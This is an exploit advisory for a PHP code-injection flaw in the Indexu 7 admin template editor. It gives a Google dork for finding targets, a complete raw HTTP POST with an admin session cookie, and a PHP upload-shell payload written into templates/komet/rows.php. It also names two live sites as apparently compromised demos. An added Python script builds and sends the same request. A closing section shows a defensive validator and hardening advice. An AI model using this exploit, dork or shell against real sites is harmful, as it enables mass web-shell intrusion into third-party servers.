# --------------------------------------- #
Author      : L3b-r1'z
Title       : Indexu 7 PHP Code Injection
Date        : 5/30/2012
Email       : L3br1z@Gmail.com
Site        : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version     : N/A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :

The admin template editor (admin/template.php, act=editfile, saved through admin/db.php) lets the admin edit any file under the templates folder, including files with a .php extension, and writes the submitted content straight back to disk. Whatever is written is then served by the PHP engine, so anyone who can reach the editor can turn a template file into a PHP backdoor. (EDITED)

The root cause is that the editor accepts any file name under templates/, .php included; it should only write non-executable template files and keep the resolved path inside the templates directory.

The PoC below is sent with the admin's session (see the Cookie header: U_AUTHENTICATED=1 and PHPSESSID); the advisory does not cover how that session is obtained, so this is code execution from the admin panel.

NOTE : Before you inject code, check that the default theme is installed (./templates/komet), because the PoC writes into it. As :
http://www.site.com/templates/komet/rows.php
# --------------------------------------- #
2) PoC :

In the top (POST) box of Live HTTP Headers' Replay dialog put :

    http://www.site.com/admin/db.php
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
    Cookie: U_AUTHENTICATED=1; __atuvc=7|22; PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8; __utma=111872281.551771833.1338331592.1338331592.1338331592.1; __utmc=111872281; __utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Content-Type: multipart/form-data; boundary=---------------------------11662147216064
    Content-Length: 1157

Send as POST content (every line ends in CRLF, written out as \r\n; each part delimiter is "--" plus the boundary from the Content-Type header, and Content-Length must match the body you actually send) :

    -----------------------------11662147216064\r\n
    Content-Disposition: form-data; name="act"\r\n
    \r\n
    editfile\r\n
    -----------------------------11662147216064\r\n
    Content-Disposition: form-data; name="id"\r\n
    \r\n
    komet\r\n
    -----------------------------11662147216064\r\n
    Content-Disposition: form-data; name="file"\r\n
    \r\n
    rows.php\r\n
    -----------------------------11662147216064\r\n
    Content-Disposition: form-data; name="file_content"\r\n
    \r\n
The payload (file_content) is a minimal PHP uploader. The HTML tags inside the echo strings were stripped from the posted copy; the markup restored below is just what the handler needs: a bold php_uname() banner, and a form with a file input named "file" and a submit button named "_upl" with value "Upload". SUKSES/GAGAL are Indonesian for success/failure.

    <?php echo '<b>'.php_uname().'</b><br>';\r\n
    echo '<form action="" method="post" enctype="multipart/form-data">';\r\n
    echo '<input type="file" name="file"><input type="submit" name="_upl" value="Upload"></form>';\r\n
    if( $_POST['_upl'] == "Upload" ) {\r\n
    \tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
    \telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
    }\r\n
    ?>\r\n
    \r\n
    -----------------------------11662147216064--\r\n

Once saved, requesting http://www.site.com/templates/komet/rows.php shows the uname banner and the upload form; files uploaded through it are copied next to rows.php under their original name.

Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png

Note : Use it at your own risk.

Demo sites :
http://telemed24.pl/templates/komet/rows.php
http://sefid.com.pl/templates/komet/rows.php
Google reports about 975,000 results for the dork (page 2, 0.17 seconds) = and more in Google :P
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Indoushka .
# --------------------------------------- #
remove this note please : this script is named Indexu 7 Web Links; I wrote the dork, you can check it now :D. The demo sites are the upload form, and the bug is PHP code injection; I wrote the PoC to inject the upload form into the default template :D. Thank you :D
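The hand-written multipart body in the PoC is easy to get wrong: the Content-Length of 1157 only matches that exact byte sequence, and every part delimiter has to be "--" followed by the boundary from the Content-Type header. The script below is an added example, not part of the original advisory, that assembles the same request programmatically. The host, the session cookie value and the file content are placeholders (assumptions); build_request() only produces bytes, and send_request() is the single function that touches the network.

```python
"""Build the multipart/form-data POST used by the PoC as raw HTTP bytes.

Added example, not from the original advisory. The host, the session cookie
and the payload passed in are placeholders; build_request() only assembles
bytes and send_request() is the one function that sends anything.
"""
import http.client
from typing import Dict, Tuple

# Boundary copied from the PoC's Content-Type header. Inside the body every
# part delimiter is "--" + this value, which is why the PoC body shows two
# more leading dashes than the header does.
BOUNDARY = "---------------------------11662147216064"


def editor_fields(theme: str, filename: str, content: str) -> Dict[str, str]:
    """The four form fields admin/db.php expects for a template edit (from the PoC)."""
    return {"act": "editfile", "id": theme, "file": filename, "file_content": content}


def encode_multipart(fields: Dict[str, str], boundary: str = BOUNDARY) -> bytes:
    """Encode plain text fields as multipart/form-data; every line ends in CRLF."""
    out = []
    for name, value in fields.items():
        out.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n"
            f"{value}\r\n"
        )
    out.append(f"--{boundary}--\r\n")   # closing delimiter
    return "".join(out).encode("utf-8")


def build_request(host: str, path: str, cookie: str, fields: Dict[str, str]) -> Tuple[bytes, bytes]:
    """Return (header block, body) of a raw HTTP/1.1 POST.

    Content-Length is computed from the encoded body instead of typed by hand,
    so the server never parses a truncated or over-long final part.
    """
    body = encode_multipart(fields)
    headers = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode("ascii")
    return headers, body


def send_request(host: str, path: str, cookie: str, fields: Dict[str, str],
                 timeout: float = 10.0) -> Tuple[int, bytes]:
    """Deliver the request over plain HTTP and return (status, response body)."""
    body = encode_multipart(fields)
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        # http.client adds Content-Length from the bytes body itself.
        conn.request("POST", path, body=body, headers={
            "Cookie": cookie,
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        })
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


if __name__ == "__main__":
    # Constructed placeholders: a harmless uname probe rather than the upload shell,
    # and a made-up session id. Nothing is sent here; the request is only printed.
    fields = editor_fields("komet", "rows.php", "<?php echo php_uname(); ?>")
    hdr, body = build_request("www.site.com", "/admin/db.php",
                              "U_AUTHENTICATED=1; PHPSESSID=<admin session id>", fields)
    print(hdr.decode("ascii") + body.decode("utf-8"))
```

Run it to see the exact bytes that Live HTTP Headers would replay; compare the computed Content-Length with the one you typed before sending anything by hand.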
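What the template editor should have done instead of writing rows.php: refuse anything the PHP engine will execute, and keep the resolved path inside the templates directory. The check below is an added illustration written in Python; Indexu is a PHP application and this is not its code. The templates root, the allowed-extension list and the function names are assumptions. It goes a step beyond the single case on this page by also rejecting double extensions such as rows.php.html (executed as PHP by Apache when AddHandler honours multiple extensions) and the other PHP-family extensions.

```python
"""Server-side validation the Indexu template editor lacks.

Added illustration in Python (the application is PHP; this is not its code).
The templates root, the extension allowlist and the names here are assumptions.
"""
import os
import re

TEMPLATES_ROOT = "/var/www/site/templates"         # assumed install layout
ALLOWED_EXT = {".tpl", ".html", ".htm", ".css"}    # nothing the PHP engine executes
# Exactly one path component: alphanumeric first character, so "..", "." and
# ".htaccess" fail, and no "/" or "\" anywhere.
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*$")


class EditRejected(ValueError):
    """Raised when an edit request must not reach the filesystem."""


def resolve_template_path(theme: str, filename: str, root: str = TEMPLATES_ROOT) -> str:
    """Map the editor's (id=theme, file=filename) pair to an absolute path, or raise."""
    for part in (theme, filename):
        if not NAME_RE.match(part):
            raise EditRejected(f"bad path component {part!r}")

    # Every extension segment counts, not just the last one: rows.php.html can
    # still run as PHP, and .phtml/.phar/.php5 are server-side code too.
    segments = filename.lower().split(".")[1:]
    if not segments or any(seg.startswith("ph") for seg in segments):
        raise EditRejected(f"{filename!r} would be executed server-side")
    if "." + segments[-1] not in ALLOWED_EXT:
        raise EditRejected(f"extension .{segments[-1]} is not an editable template type")

    # Containment after symlink resolution, not a string-prefix comparison.
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, theme, filename))
    if os.path.commonpath([root_real, target]) != root_real:
        raise EditRejected("resolved path leaves the templates directory")
    return target


def is_editable(theme: str, filename: str, root: str = TEMPLATES_ROOT) -> bool:
    """Accept/reject wrapper for callers that do not need the reason."""
    try:
        resolve_template_path(theme, filename, root)
        return True
    except EditRejected:
        return False


if __name__ == "__main__":
    # Constructed inputs: the PoC's own file name, the bypass variants, and a legitimate edit.
    for theme, name in [("komet", "rows.php"), ("komet", "rows.php.html"),
                        ("komet", "rows.phtml"), ("..", "rows.html"),
                        ("komet", "../admin/db.html"), ("komet", "rows.html")]:
        print(f"{theme}/{name}: {'allowed' if is_editable(theme, name, '/tmp/tpl') else 'rejected'}")
```

Even with this check in place, the stronger fix is to take PHP execution away from the templates directory altogether (php_admin_flag engine off, or templates stored outside the document root), so that a future editor bug cannot turn into code execution again.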